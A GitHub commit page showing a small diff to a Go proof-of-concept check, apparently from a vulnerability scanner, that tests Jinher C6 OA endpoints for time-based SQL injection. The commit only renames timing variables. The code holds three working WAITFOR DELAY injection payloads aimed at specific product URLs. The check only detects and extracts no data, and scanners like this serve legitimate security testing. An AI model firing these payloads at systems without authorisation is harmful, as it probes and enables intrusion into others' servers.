Skip to content

Commit

Permalink
Update Sql_Check.go
Browse files Browse the repository at this point in the history
  • Loading branch information
youki992 committed Mar 28, 2024
1 parent 15a7f13 commit dcbe9d1
Showing 1 changed file with 6 additions and 6 deletions.
12 changes: 6 additions & 6 deletions pocs_go/jinher/Sql_Check.go
Original file line number Diff line number Diff line change
Expand Up @@ -22,38 +22,38 @@ func Check(url string) bool {
}
}
}
startTime := time.Now()
startTime_One := time.Now()
if req, err := pkg.HttpRequset(url+"/C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1", "GET", "", false, nil); err == nil {
if req.StatusCode == 200 {
// 请求成功,计算响应时间
endTime := time.Now()
responseTime := endTime.Sub(startTime)
responseTime := endTime.Sub(startTime_One)
// 判断响应时间是否超过5秒
if responseTime.Seconds() >= 5 {
pkg.GoPocLog(fmt.Sprintf("Found vuln SQL_injection|%s\n", url+"/C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1"))
return true
}
}
}
startTime := time.Now()
startTime_Two := time.Now()
if req, err := pkg.HttpRequset(url+"/C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=-1;WAITFOR+DELAY+%270:0:5%27--", "GET", "", false, nil); err == nil {
if req.StatusCode == 200 {
// 请求成功,计算响应时间
endTime := time.Now()
responseTime := endTime.Sub(startTime)
responseTime := endTime.Sub(startTime_Two)
// 判断响应时间是否超过5秒
if responseTime.Seconds() >= 5 {
pkg.GoPocLog(fmt.Sprintf("Found vuln SQL_injection|%s\n", url+"/C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=-1;WAITFOR+DELAY+%270:0:5%27--"))
return true
}
}
}
startTime := time.Now()
startTime_Three := time.Now()
if req, err := pkg.HttpRequset(url+"/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1;WAITFOR+DELAY+'0:0:5'--", "GET", "", false, nil); err == nil {
if req.StatusCode == 200 {
// 请求成功,计算响应时间
endTime := time.Now()
responseTime := endTime.Sub(startTime)
responseTime := endTime.Sub(startTime_Three)
// 判断响应时间是否超过5秒
if responseTime.Seconds() >= 5 {
pkg.GoPocLog(fmt.Sprintf("Found vuln SQL_injection|%s\n", url+"/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1;WAITFOR+DELAY+'0:0:5'--"))
Expand Down

0 comments on commit dcbe9d1

Please sign in to comment.